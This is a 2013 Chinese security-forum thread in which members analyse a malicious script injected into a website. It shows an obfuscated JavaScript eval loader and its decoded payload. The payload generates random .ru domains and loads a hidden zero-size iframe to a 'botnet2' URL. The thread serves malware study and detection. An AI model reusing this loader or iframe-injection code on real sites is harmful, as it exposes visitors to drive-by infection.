收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) www.jasonslog.com/【本体失效 by 阿狸】
返回列表 发新帖
查看: 856|回复: 3
收起左侧

[已鉴定] www.jasonslog.com/【本体失效 by 阿狸】

 关闭 [复制链接]
firefox3
发表于 2013-1-2 14:48:18 | 显示全部楼层 |阅读模式
本帖最后由 wjhstu-VxG 于 2013-1-2 16:36 编辑

malicious injected script

样本在哪里?
回复

举报

812969
发表于 2013-1-2 15:32:51 | 显示全部楼层
sshot-6.jpg
回复

举报

wjhstu-VxG
发表于 2013-1-2 16:27:04 | 显示全部楼层
  1. try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5;}catch(z){fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,160,708,485,684,160,624,525,192,305,192,580,624,525,690,230,690,505,606,500,192,235,192,580,624,525,690,230,486,295,60,160,192,160,192,590,582,570,192,540,666,160,366,160,696,520,630,575,276,575,606,505,600,160,222,160,696,520,630,575,276,405,354,50,192,160,192,160,708,485,684,160,696,505,690,580,192,305,192,580,624,525,690,230,390,160,252,160,648,555,192,225,192,580,624,525,690,230,492,160,252,160,624,525,354,50,192,160,192,160,630,510,240,580,606,575,696,160,372,160,288,205,738,50,192,160,192,160,192,160,192,160,696,520,630,575,276,575,606,505,600,160,366,160,696,505,690,580,354,50,192,160,192,160,750,160,606,540,690,505,192,615,60,160,192,160,192,160,192,160,192,580,624,525,690,230,690,505,606,500,192,305,192,580,606,575,696,160,258,160,696,520,630,575,276,385,354,50,192,160,192,160,750,50,192,160,192,160,684,505,696,585,684,550,192,200,696,520,630,575,276,575,606,505,600,160,252,160,696,520,630,575,276,555,660,505,474,590,606,570,462,205,354,50,750,50,60,510,702,550,594,580,630,555,660,160,492,485,660,500,666,545,468,585,654,490,606,570,426,505,660,505,684,485,696,555,684,200,702,550,630,600,246,615,60,160,192,160,192,590,582,570,192,500,192,305,192,550,606,595,192,340,582,580,606,200,702,550,630,600,252,245,288,240,288,205,354,50,192,160,192,160,708,485,684,160,690,160,366,160,600,230,618,505,696,360,666,585,684,575,240,205,192,310,192,245,300,160,378,160,294,160,348,160,288,295,60,160,192,160,192,580,624,525,690,230,690,505,606,500,192,305,192,250,306,260,318,270,330,280,342,240,294,160,258,160,240,500,276,515,606,580,462,555,660,580,624,200,246,160,252,160,288,600,420,350,420,350,420,350,246,160,258,160,240,500,276,515,606,580,408,485,696,505,240,205,192,210,192,240,720,350,420,350,420,205,258,160,240,385,582,580,624,230,684,555,702,550,600,200,690,160,252,160,288,600,420,350,420,205,246,295,60,160,192,160,192,580,624,525,690,230,390,160,366,160,312,280,300,275,294,295,60,160,192,160,192,580,624,525,690,230,462,160,366,160,300,245,312,275,312,280,306,270,312,275,354,50,192,160,192,160,696,520,630,575,276,405,192,305,192,580,624,525,690,230,462,160,282,160,696,520,630,575,276,325,354,50,192,160,192,160,696,520,630,575,276,410,192,305,192,580,624,525,690,230,462,160,222,160,696,520,630,575,276,325,354,50,192,160,192,160,696,520,630,575,276,555,660,505,474,590,606,570,462,160,366,160,294,230,288,160,282,160,696,520,630,575,276,385,354,50,192,160,192,160,696,520,630,575,276,550,606,600,696,160,366,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,354,50,192,160,192,160,684,505,696,585,684,550,192,580,624,525,690,295,60,625,60,50,612,585,660,495,696,525,666,550,192,495,684,505,582,580,606,410,582,550,600,555,654,390,702,545,588,505,684,200,684,220,192,385,630,550,264,160,462,485,720,205,738,50,192,160,192,160,684,505,696,585,684,550,192,385,582,580,624,230,684,555,702,550,600,200,240,385,582,600,270,385,630,550,246,160,252,160,684,230,660,505,720,580,240,205,192,215,192,385,630,550,246,295,60,625,60,50,612,585,660,495,696,525,666,550,192,515,606,550,606,570,582,580,606,400,690,505,702,500,666,410,582,550,600,555,654,415,696,570,630,550,618,200,702,550,630,600,264,160,648,505,660,515,696,520,264,160,732,555,660,505,246,615,60,160,192,160,192,590,582,570,192,570,582,550,600,160,366,160,660,505,714,160,492,485,660,500,666,545,468,585,654,490,606,570,426,505,660,505,684,485,696,555,684,200,702,550,630,600,246,295,60,160,192,160,192,590,582,570,192,540,606,580,696,505,684,575,192,305,192,455,234,485,234,220,234,490,234,220,234,495,234,220,234,500,234,220,234,505,234,220,234,510,234,220,234,515,234,220,234,520,234,220,234,525,234,220,234,530,234,220,234,535,234,220,234,540,234,220,234,545,234,220,234,550,234,220,234,555,234,220,234,560,234,220,234,565,234,220,234,570,234,220,234,575,234,220,234,580,234,220,234,585,234,220,234,590,234,220,234,595,234,220,234,600,234,220,234,605,234,220,234,610,234,465,354,50,192,160,192,160,708,485,684,160,690,580,684,160,366,160,234,195,354,50,192,160,192,160,612,555,684,200,708,485,684,160,630,160,366,160,288,295,192,525,192,300,192,540,606,550,618,580,624,295,192,525,192,215,258,160,246,615,60,160,192,160,192,160,192,160,192,575,696,570,192,215,366,160,648,505,696,580,606,570,690,455,594,570,606,485,696,505,492,485,660,500,666,545,468,585,654,490,606,570,240,570,582,550,600,220,192,240,264,160,648,505,696,580,606,570,690,230,648,505,660,515,696,520,192,225,192,245,246,465,354,50,192,160,192,160,750,50,192,160,192,160,684,505,696,585,684,550,192,575,696,570,192,215,192,195,276,195,192,215,192,610,666,550,606,295,60,625,60,50,690,505,696,420,630,545,606,555,702,580,240,510,702,550,594,580,630,555,660,200,246,615,60,160,192,160,192,580,684,605,738,50,192,160,192,160,192,160,192,160,630,510,240,580,726,560,606,555,612,160,630,510,684,485,654,505,522,485,690,335,684,505,582,580,606,500,192,305,366,160,204,585,660,500,606,510,630,550,606,500,204,205,738,50,192,160,192,160,192,160,192,160,192,160,192,160,630,510,684,485,654,505,522,485,690,335,684,505,582,580,606,500,192,305,192,580,684,585,606,295,60,160,192,160,192,160,192,160,192,160,192,160,192,590,582,570,192,585,660,525,720,160,366,160,462,485,696,520,276,570,666,585,660,500,240,215,660,505,714,160,408,485,696,505,240,205,282,245,288,240,288,205,354,50,192,160,192,160,192,160,192,160,192,160,192,160,708,485,684,160,600,555,654,485,630,550,468,485,654,505,192,305,192,515,606,550,606,570,582,580,606,400,690,505,702,500,666,410,582,550,600,555,654,415,696,570,630,550,618,200,702,550,630,600,264,160,294,270,264,160,234,570,702,195,246,295,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,160,366,160,600,555,594,585,654,505,660,580,276,495,684,505,582,580,606,345,648,505,654,505,660,580,240,170,438,350,492,325,462,345,204,205,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,230,690,505,696,325,696,580,684,525,588,585,696,505,240,170,690,570,594,170,264,160,204,520,696,580,672,290,282,235,204,215,600,555,654,485,630,550,468,485,654,505,258,170,282,570,702,550,612,555,684,505,690,580,684,585,660,315,690,525,600,305,588,555,696,550,606,580,300,170,246,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,630,510,684,545,276,575,696,605,648,505,276,595,630,500,696,520,192,305,192,170,288,560,720,170,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,230,690,580,726,540,606,230,624,505,630,515,624,580,192,305,192,170,288,560,720,170,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,230,690,580,726,540,606,230,708,525,690,525,588,525,648,525,696,605,192,305,192,170,624,525,600,500,606,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));}
  2. if(f)e(s);}
复制代码
解了一步,接下来学习代码中……
回复

举报

wjhstu-VxG
发表于 2013-1-2 16:35:41 | 显示全部楼层
wjhstu-VxG 发表于 2013-1-2 16:27
解了一步,接下来学习代码中……
  1. function createRandomNumber(r, Min, Max){
  2.     return Math.round((Max-Min) * r.next() + Min);
  3. }

  5. function generatePseudoRandomString(unix, length, zone){
  6.     var rand = new RandomNumberGenerator(unix);
  7.     var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
  8.     var str = '';
  9.     for(var i = 0; i < length; i ++ ){
  10.         str += letters[createRandomNumber(rand, 0, letters.length - 1)];
  11.     }
  12.     return str + '.' + zone;
  13. }

  15. setTimeout(function(){
  16.     try{
  17.         if(typeof iframeWasCreated == "undefined"){
  18.             iframeWasCreated = true;
  19.             var unix = Math.round(+new Date()/1000);
  20.             var domainName = generatePseudoRandomString(unix, 16, 'ru');
  21.             ifrm = document.createElement("IFRAME");
  22.             ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=botnet2");
  23.             ifrm.style.width = "0px";
  24.             ifrm.style.height = "0px";
  25.             ifrm.style.visibility = "hidden";
  26.             document.body.appendChild(ifrm);
  27.         }
  28.     }catch(e){}
  29. }, 500);
复制代码
这个是本体,上面应该是文件随机名的产生过程……但是这个貌似失效了
  1. http://"+domainName+"/runforestrun?sid=botnet2
复制代码
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-3-9 11:24 , Processed in 0.138294 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表